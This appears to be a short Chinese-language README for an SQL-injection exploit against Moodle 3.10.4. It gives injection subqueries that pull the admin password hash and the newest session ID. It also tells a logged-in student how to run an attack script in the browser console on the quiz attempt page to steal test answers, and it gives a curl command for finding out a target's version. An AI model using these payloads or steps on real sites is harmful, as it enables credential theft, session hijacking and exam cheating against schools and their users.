基于错误的多位移位盲SQL注入,针对Moodle 3.10.4。
允许攻击者执行任意数据库查询。例如,可以窃取:
数据库中的测试答案
修改 script.js 文件并在路由 /mod/quiz/attempt.php?attempt=...&cmid=... 上运行它
用户密码哈希:
(SELECT password FROM mdl_user WHERE id = 2 LIMIT 1)
用户会话:
(SELECT sid FROM mdl_sessions ORDER BY id DESC LIMIT 1)
您必须登录并至少注册一门课程。只需将 script.js 代码复制到浏览器控制台,并在安装了易受攻击版本 Moodle 的网站上运行它。
DOMAIN="example.com"
curl -s https://$DOMAIN/lib/upgrade.txt | head